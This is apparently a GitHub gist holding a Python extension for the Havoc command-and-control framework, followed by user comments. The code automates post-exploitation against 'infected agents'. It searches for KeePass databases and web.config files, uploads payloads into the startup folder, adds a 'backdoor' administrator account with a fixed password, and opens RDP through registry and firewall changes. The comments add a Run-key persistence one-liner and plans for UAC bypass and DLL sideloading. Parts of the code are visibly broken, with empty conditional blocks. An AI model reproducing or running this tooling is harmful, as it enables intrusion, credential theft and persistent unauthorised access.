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Last active June 26, 2024 23:50
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#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Made by papi
# Created on: Di 10 Okt 2023 01:54:42 CEST
# Description:
# A havoc extention to search for files inside of infected agents
# Usage:
# To use this script save it on your machine and add it to the script manager of Havoc
# inside of: Scripts > Scripts Manager > Load Script
import os
import subprocess
from shutil import which
import havocui
import havoc
auto_search = havocui.Widget("Auto Search", True)
auto_recon = havocui.Widget("Auto Recon", True)
auto_persist = havocui.Widget("Auto Persist", True)
auto_GUI = havocui.Widget("Auto rdp", True)
demons = []
# auto search vars
selecte_demon = None
powershell = False
batch = False
text_files = False
exe_files = False
WebConf = False
Keypass = False
# auto persist vars
local_payload_path = ""
shell_startup = False
backdoor_user = False
# auto recon vars
auto_custompowershell = False
auto_custompowershell_cmd = ""
auto_bofbelt = False
auto_password_policy = False
auto_scrot = False
# auto GUI vars
# ... Auto GUI section ...
def set_username_gui(text):
global username
username = text
def set_password_gui(text):
global password
password = text
def set_domain_gui(text):
global domain
domain = text
def set_dynamic_resultion():
global dynamic_resolution
dynamic_resolution = not dynamic_resolution
def set_ssl_security():
global disable_ssl_security
disable_ssl_security = not disable_ssl_security
def set_admin_mode():
global admin_mode_gui
admin_mode_gui = not admin_mode_gui
def set_set_firewall():
global set_firewall_and_task
set_firewall_and_task = not set_firewall_and_task
def open_autogui():
if which("xfreerdp") == None:
auto_GUI.addLabel("<h3 style='color:#ff0000'>You are missing the XFREERDP package please install it to use this functionality</h3>")
auto_GUI.addLabel("<h3 style='color:#bd93f9'>Settings of autordp command</h3>")
auto_GUI.addLabel("<h6 style='color:#ff0000'>[!] means you need admin priv</h6>")
auto_GUI.addLabel("<span style='color:#71e0cb'>username:</span>")
auto_GUI.addLineedit(username, set_username_gui)
auto_GUI.addLabel("<span style='color:#71e0cb'>password:</span>")
auto_GUI.addLineedit(password, set_password_gui)
auto_GUI.addLabel("<span style='color:#71e0cb'>domain:</span>")
auto_GUI.addLineedit(domain, set_domain_gui)
auto_GUI.addLabel("<span style='color:#71e0cb'>options:</span>")
auto_GUI.addCheckbox("dynamic resolution", set_dynamic_resultion, dynamic_resolution)
auto_GUI.addCheckbox("dissable ssl", set_ssl_security, disable_ssl_security)
auto_GUI.addCheckbox("admin mode", set_admin_mode, admin_mode_gui)
auto_GUI.addCheckbox("[!] add firewall rule and activate rdp (remote machine)", set_set_firewall, set_firewall_and_task)
def run_autogui(demonID, *param):
TaskID : str = None
demon : Demon = None
cmd = ""
demon = havoc.Demon(demonID)
if domain != "":
cmd = "bash -c \"yes | xfreerdp /u:%s\\%s /p:%s /v:%s" % (domain, username, password, demon.InternalIP)
cmd = "bash -c \"yes | xfreerdp /u:%s /p:%s /v:%s" % (username, password, demon.InternalIP)
if disable_ssl_security:
cmd += " /tls-seclevel:0"
if dynamic_resolution:
cmd += " /dynamic-resolution"
if admin_mode_gui:
cmd += " /admin"
cmd += "\""
TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Running: %s" % cmd )
if set_firewall_and_task:
demon.Command(TaskID, "shell reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f")
demon.Command(TaskID, "shell netsh advfirewall firewall set rule group=\"remote desktop\" new enable=yes")
subprocess.Popen(cmd, shell=True)
return TaskID
# ... Auto Search section...
def set_directory(text):
global dir_to_search
dir_to_search = text
def slct_powershell():
global powershell
powershell = not powershell
def slct_batch():
global batch
batch = not batch
def slct_exe():
global exe_files
exe_files = not exe_files
def slct_text():
global text_files
text_files = not text_files
def slct_webconf():
global WebConf
WebConf = not WebConf
def slct_Key():
global Keypass
Keypass = not Keypass
def select_widget(num):
global powershell
global selecte_demon
global demons
if num != 0:
selecte_demon = havoc.Demon(demons[num - 1])
def run_auto_search():
global powershell
global selecte_demon
global text_files
global WebConf
global Keypass
global batch
global exe_files
global dir_to_search
if selecte_demon is None:
havocui.errormessage("You have not selected a demon! Please select one or start infecting machines if none are present in the drop down.")
TaskID = selecte_demon.ConsoleWrite( selecte_demon.CONSOLE_TASK, "Tasked demon to Find files" )
if powershell:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.ps1 -Recurse\"" % dir_to_search)
if batch:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.bat -Recurse\"" % dir_to_search)
if text_files:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.txt -Recurse\"" % dir_to_search)
if WebConf:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *web.config -Recurse\"" % dir_to_search)
if Keypass:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.kdbx -Recurse\"" % dir_to_search)
if exe_files:
selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.exe -Recurse\"" % dir_to_search)
return TaskID
def open_autosearch():
global demons
demons = havoc.GetDemons()
auto_search.addLabel("<h3 style='color:#bd93f9'>Select a demon to search files on</h3>")
auto_search.addCombobox(select_widget, "select demon", *demons)
auto_search.addLabel("<span style='color:#71e0cb'>Folder to start search:</span>")
auto_search.addLineedit(dir_to_search, set_directory)
auto_search.addLabel("<span style='color:#71e0cb'>File types:</span>")
auto_search.addCheckbox("powershell files (*.ps1)", slct_powershell, powershell)
auto_search.addCheckbox("batch files (*.bat)", slct_batch, batch)
auto_search.addCheckbox("text files (*.txt)", slct_text, text_files)
auto_search.addCheckbox("web.config files (*web.config)", slct_webconf, WebConf)
auto_search.addCheckbox("KeePass Database files (*.kdbx)", slct_Key, Keypass)
auto_search.addCheckbox("Executable files (*.exe)", slct_exe, exe_files)
auto_search.addButton("Start search!", run_auto_search)
# ... Auto Persist section ...
def set_payload_path(data):
global local_payload_path
local_payload_path = data
def slct_user_startup():
global shell_startup
shell_startup = not shell_startup
def slct_backdoor_user():
global backdoor_user
backdoor_user = not backdoor_user
def run_persist():
global selecte_demon
global local_payload_path
global shell_startup
if selecte_demon is None:
havocui.errormessage("You have not selected a demon! Please select one or start infecting machines if none are present in the drop down.")
TaskID = selecte_demon.ConsoleWrite( selecte_demon.CONSOLE_TASK, "Tasked demon to persist itself" )
if shell_startup:
selecte_demon.Command(TaskID, "powershell \"[Environment]::GetFolderPath([Environment+SpecialFolder]::CommonStartup) | cd\"")
selecte_demon.Command(TaskID, "upload %s" % local_payload_path)
if backdoor_user:
selecte_demon.Command(TaskID, "shell net user backdoor password123 /add")
selecte_demon.Command(TaskID, "shell net localgroup \"Administrators\" backdoor /add")
selecte_demon.Command(TaskID, "shell net localgroup \"Remote Desktop Users\" backdoor /add")
return TaskID
def open_autopersist():
global demons
demons = havoc.GetDemons()
auto_persist.addLabel("<h3 style='color:#bd93f9'>Select a demon to set persistance on</h3>")
auto_persist.addCombobox(select_widget, "select demon", *demons)
auto_persist.addLabel("<span style='color:#71e0cb'>Path of payload on attacking end:</span>")
auto_persist.addLineedit("/home/user/payload.exe", set_payload_path)
auto_persist.addLabel("<span style='color:#71e0cb'>Persistance type:</span>")
auto_persist.addCheckbox("shell:startup", slct_user_startup, shell_startup)
auto_persist.addCheckbox("backdoor user", slct_backdoor_user, backdoor_user)
auto_persist.addButton("Persist!", run_persist)
# ... Auto recon section ...
def slct_bofbelt():
global auto_bofbelt
auto_bofbelt = not auto_bofbelt
def run_bofbelt(identifier):
demon = havoc.Demon(identifier)
TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run bofbelt" )
demon.Command(TaskID, "bofbelt")
def slct_scrot():
global auto_scrot
auto_scrot = not auto_scrot
def run_scrot(identifier):
demon = havoc.Demon(identifier)
TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run screenshot" )
demon.Command(TaskID, "screenshot")
def slct_pwpolicy():
global auto_password_policy
auto_password_policy = not auto_password_policy
def run_pwpolicy(identifier):
demon = havoc.Demon(identifier)
TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run get_password_policy" )
demon.Command(TaskID, "get_password_policy")
def run_custpowershell(identifier):
global auto_custompowershell_cmd
demon = havoc.Demon(identifier)
TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run get_password_policy" )
demon.Command(TaskID, "powershell \"%s\"" % auto_custompowershell_cmd)
def set_powershell(text):
global auto_custompowershell
global auto_custompowershell_cmd
if len(text) > 0:
auto_custompowershell = True
auto_custompowershell_cmd = text
def save_autorecon():
global auto_bofbelt
global auto_password_policy
global auto_scrot
global auto_custompowershell
event = havoc.Event("events")
if auto_bofbelt:
if auto_password_policy:
if auto_scrot:
if auto_custompowershell:
auto_recon.addLabel("<h3 style='color:#bd93f9'>Run commands on new session</h3>")
auto_recon.addLabel("<span style='color:#71e0cb'>Pre-defined commands:</span>")
auto_recon.addCheckbox("bofbelt (seat belt recon tool)", slct_bofbelt, auto_bofbelt)
auto_recon.addCheckbox("get_password_policy", slct_pwpolicy, auto_password_policy)
auto_recon.addCheckbox("screenshot", slct_scrot, auto_scrot)
auto_recon.addLabel("<span style='color:#71e0cb'>Custom powershell command:</span>")
auto_recon.addLineedit("Get-ChildItem...", set_powershell)
auto_recon.addButton("Save", save_autorecon)
def open_autorecon():
if not which("xfreerdp") == None:
havoc.RegisterCommand( run_autogui, "", "autordp", "Connect to the machine using xfreerdp.", 0, "", "" )
havocui.createtab("Auto Suite", "Auto search", open_autosearch, "Auto recon", open_autorecon, "Auto persist", open_autopersist, "Auto rdp", open_autogui)
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p4p1 commented Oct 20, 2023


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p4p1 commented Oct 30, 2023


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hastalamuerte commented Feb 28, 2024

Hello, thank you for such great script, can you help plz with Autopersist extension usage.
I try different variants of path where my payload is stored on target machine, but still no execution (backslashes in all ways, with or without C: and many other . with shell checked , without checked)
for example it stored on C:\Users\Mister\Documents\putty.exe
what path should i enter ? (also i am in runtime broker and it sometimes provoke a errors with get env and user info)

manually i successfully add putty persist) with -
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'MyUserTask' -Value "$env:USERPROFILE\Documents\putty.exe"; Start-Process "$env:USERPROFILE\Documents\putty.exe"

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p4p1 commented Mar 1, 2024

@hastalamuerte So currently the path you would put inside of the auto persist extension would be your local path for the demon and not the path on the victim machine since the path that is used on the victim machine is the following and can't be changed:


But I don't see why I couldn't add a way to specify a folder since that would be cool. Currently for all of the Havoc extensions I am taking a small break since I'm focusing on certificates (mainly OSEP) and I'm waiting for the big front-end api change that 5pider mentioned on his twitter since once that hits I'll update all of the extensions I maintain to use the new API calls. I might add your feature over the next few months since I'd use it for doing zephyr and then OSEP no promises thow for now since I'm quite busy. I also wanted to add sections in auto persist for creating like a service that starts on boot with the exe and other things of the such. I'll use this comment as a todo list and make an alert in my general personal todo list to do them at some point I'll also do a comment where I tag you once I'm done implementing them at some point. Also feel free to reach out if you just need it quick and want to implement it yourself :)

Todo Idea for the future

  • @hastalamuerte idea's with custom paths for persistance
  • shortcut / lnk file system for custom paths and add the link to the shell:startup path if checked in the menu
  • Service system with auto start the service with the exe.

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hastalamuerte commented Mar 4, 2024

Thanks for answer! Wish a good luck with OSEP. Me too in wait for havoc rewrite.

Seems i was miss attacking/attackers machine - repeat it with selfhosted payload (both methods), receive only Access Denied for User.
(Set-ItemProperty -Path 'HKCU:\Soft.... Still work for User with no Admin or some other privs like selfimpersonate , its win 10 test machine with account on one drive, so i see that many of methods and tool not work on that env) -but maybe that technique deserve to be in

Cause low code, i can just advice some logic that possible may be helpful -
Something like individual trays/chains with checkboxes for 1. New User 2. New Admin 3. Manual .
Payload - Target / Stored / Remote + to add files in chain, for dll sideloading etc .
Output folder .
Elevate/Uac - 1 Technique 2 Path there is havoc script / potatos
And maybe add a option to add commands (like recon, or integrate him), even between steps (yep oneliners is cool , but sometimes syntax broke all) , and not only powershell command on start, like extensions/modules commands - for ex run "uac-bypass elevatedcom file.exe" "dll spawn explorer exe" .

So if rightly setup unpriv and priv chains it might be fully auto c2)
(upd. i found session.Elevated and Session.OS in havoc and Elevated / "Elevated": Agent.Info.Elevated in demons.go, hope it will help to identify privileges on demon initial to understand what commands list send to it) - will try to implement in py (upd. -fail seems havoc dont understand that , or i code wrong. Panel can understand what kind of demon/user it is .. so possible script can.)

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